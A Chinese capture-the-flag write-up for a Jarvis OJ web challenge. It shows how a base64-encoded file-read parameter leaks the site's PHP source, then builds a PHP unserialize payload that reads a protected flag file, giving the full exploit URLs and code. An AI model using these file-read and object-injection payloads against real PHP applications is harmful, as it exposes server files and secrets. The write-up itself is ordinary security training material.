题目地址

http://web.jarvisoj.com:32768/

首页是一张图片

查看源码,看到了一些猫腻,showing.php     c2hpZWxkLmpwZw==是base64编码    解码成shield.jpg

我们尝试输入一下,得到了一堆乱码,可以确定是一个文件包含漏洞,可以任意读取服务器文件,文件名用base64加密

尝试读取一下shield.php(c2hpZWxkLnBocA==)

view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
<?php

    $f = $_GET['img'];

    if (!empty($f)) {

        $f = base64_decode($f);

        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE

        && stripos($f,'pctf')===FALSE) {

            readfile($f);

        } else {

            echo "File not found!";

        }

    }

?>

过滤了切换目录的字符和pctf

之后我们尝试获取index.php的页面   index.php(aW5kZXgucGhw)





view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw






<?php

    require_once('shield.php');

    $x = new Shield();

    isset($_GET['class']) && $g = $_GET['class'];

    if (!empty($g)) {

        $x = unserialize($g);

    }

    echo $x->readfile();

?>




包含shield.php,可以通过get传参的方式,new 一个shield类,然后进行反序列化,那就读取一下shield.php(c2hpZWxkLnBocA==)的内容




http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==






<?php

    //flag is in pctf.php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

?>




得到了shield的类的构造函数和方法,还有提示flag在pctf.php   那读取一下pctf.php(cGN0Zi5waHA=)




http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=






没有找到文件,前面过滤掉了pctf,所以不能直接利用,但是定义shield类里面没有进行过滤,我们利用反序列化漏洞,构造一个shield类,且属性file为pctf.php


把上面的序列化代码复制下来,本地跑一下




<?php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

     $shield = new Shield('pctf.php');

    echo serialize($shield);

?>





得到本地的结果




然后输入最后的payload




http://web.jarvisoj.com:32768/?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}




因为是被注释的,只能查看源码F12才能找到flag




考察点


文件包含漏洞


反序列化漏洞
												


											
web-神盾局的秘密的更多相关文章
	

    
						
  1. jarvis OJ WEB题目writeup
		
    0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具 ...
    
		
    2. 
						
  2. JarvisOJ平台Web题部分writeup
		
    PORT51 题目链接:http://web.jarvisoj.com:32770/ 这道题本来以为是访问服务器的51号端口,但是想想又不太对,应该是本地的51号端口访问服务器 想着用linux下的c ...
    
		
    3. 
						
  3. 【web  JSP  basePath】basePath的含义
		
    问题1:WEB-INF的问题 今天新创建项目,在JSP中引入外部的JS文件和CSS文件,但是路径一直显示错误: 其中JSP页面引入这几个文件是这么写的: <link rel="styl ...
    
		
    4. 
						
  4. PCTF-2016-WEB
		
    Pctf ** web100 PORT51**  开始看到这个真的无法下手,想过用python–socket编程或者scapy发包.自己觉得是可以的,但是没有去试,后面看一大神writeup,知道:  ...
    
		
    5. 
						
  5. PHP反序列化漏洞研究
		
    序列化 序列化说通俗点就是把一个对象变成可以传输的字符串 php serialize()函数 用于序列化对象或数组,并返回一个字符串.序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结 ...
    
		
    6. 
						
  6. C# (转载)webbrowser专题(参考资料:https://www.cnblogs.com/blogpro/p/11458390.html)
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    7. 
						
  7. C# webbrowser专题
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    8. 
						
  8. Spring Boot的前世今生以及它和Spring Cloud的关系详解。
		
    要了解Spring Boot的发展背景,还得从2004年Spring Framework1.0版本发布开始说起,不过大家都是从开始学习Java就使用Spring Framework了,所以就不做过多展 ...
    
		
    9. 
						
  9. 【原】移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    10. 
						
  10. 移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. 队列Queue的实现
			
    数组实现 package DataStructures.Queues; /** * This implements Queues by using the class Queue. * <p&g ...
    
			
    2. 
						
  2. Codeforces Round #599 (Div. 2) B1. Character Swap (Easy Version) 水题
			
    B1. Character Swap (Easy Version) This problem is different from the hard version. In this version U ...
    
			
    3. 
						
  3. Azure Sphere Development Environment Setup
			
    1. Visual Studio 目前,Visual Studio 2017/2019支持Azure Sphere开发,后续,微软会加入Visual Studio Code的支持.以Visual St ...
    
			
    4. 
						
  4. 使用rsync基于ssh免密登陆进行备份或目录同步
			
    日常工作中有很多的备份工作,rsync是一个很不错的工具,尝试使用基于ssh免密登陆的方式进行备份,测试成功,是可行且方便的方法,撰文记之,以备后用: 1.A主机root用户对B主机root用户做ss ...
    
			
    5. 
						
  5. Android常用adb命令总结(一)
			
    ADB是android sdk里的一个工具,用这个工具可以直接操作管理android模拟器或者真实的andriod设备. ADB是一个客户端-服务器端程序,其中客户端是你用来操作的电脑,服务器端是an ...
    
			
    6. 
						
  6. IT兄弟连 Java语法教程 数组 数组的声明
			
    Java语言支持两种语法格式来定义数组: type[] arrayName; type arrayName[]; 对这两种语法格式而言,通常推荐使用第一种格式,因为第一种格式不仅具有更好的语义,而且具 ...
    
			
    7. 
						
  7. Map拼接URL地址
			
    import java.util.HashMap; import java.util.Iterator; import java.util.Map; /** * @Author: hoje * Des ...
    
			
    8. 
						
  8. 【LOJ#6682】梦中的数论(min_25筛)
			
    [LOJ#6682]梦中的数论(min_25筛) 题面 LOJ 题解 注意题意是\(j|i\)并且\((j+k)|i\), 不难发现\(j\)和\((j+k)\)可以任意取\(i\)的任意因数,且\( ...
    
			
    9. 
						
  9. WPF DataGrid显示MySQL查询信息,且可删除、修改、插入 (原发布 csdn 2018-10-13 20:07:28)
			
    1.入行好几年了,工作中使用数据库几率很小(传统行业).借着十一假期回家机会,学习下数据库. 2.初次了解数据库相关知识,如果本文有误,还望告知. 3.本文主要目的,记录下wpf界面显示数据库信息,且 ...
    
			
    10. 
						
  10. python库的tkinter带你进入GUI世界(计算器简单功能)
			
    前言 文的文字及图片来源于网络,仅供学习.交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理. 作者: 一个处女座的程序猿 PS:如有需要Python学习资料的小伙伴可以加 ...
    
			
    11.